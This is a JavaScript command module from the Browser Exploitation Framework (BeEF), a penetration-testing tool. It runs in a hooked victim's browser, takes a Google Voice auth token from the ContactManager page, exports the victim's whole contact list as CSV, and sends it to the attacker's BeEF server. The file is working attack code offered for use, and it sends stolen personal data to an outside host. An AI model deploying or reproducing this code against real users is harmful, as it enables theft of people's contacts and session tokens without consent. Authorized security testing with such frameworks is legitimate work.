1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8
		var regContacts = '("AuthToken":{"Value":")(.*)("}}};)';
9
		function grabCSV(token){
10
			var csv = new XMLHttpRequest();
11
			csv.open("GET", "https://www.google.com/voice/c/b/X/data/export?groupToExport=%5EMine&exportType=ALL&out=GMAIL_CSV&tok="+token,false);
12
			csv.setRequestHeader("Content-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.3");
13
			csv.send();
14
			return csv.responseText
15
		}
16
		
17
		function toolContact(v) {
18
		 	var re = new RegExp(regContacts);
19
		 	var m = re.exec(v);
20
		 	if (m != null) {
21
				tmpCSV = grabCSV(m[2])
22
				params = "email=email&csv="+tmpCSV;
23
                beef.net.send('<%= @command_url %>', <%= @command_id %>, tmpCSV);
24
			 }
25
		}
26

27
		function grabContacts(){
28
			var client = new XMLHttpRequest();
29
			client.open("GET", "https://www.google.com/voice/c/b/X/ui/ContactManager" ,false);
30
			client.setRequestHeader("Content-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.3");
31
			client.send();
32
			if(client.status != 200){ // if the victim is not authenticated in Google, a 403 Forbidden error is received.
33
			    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'The victim is not logged in Google.');
34
			}else{ //proceed
35
			    toolContact(client.responseText);
36
			}
37
		}
38

39
		grabContacts();
40
});
41

42

43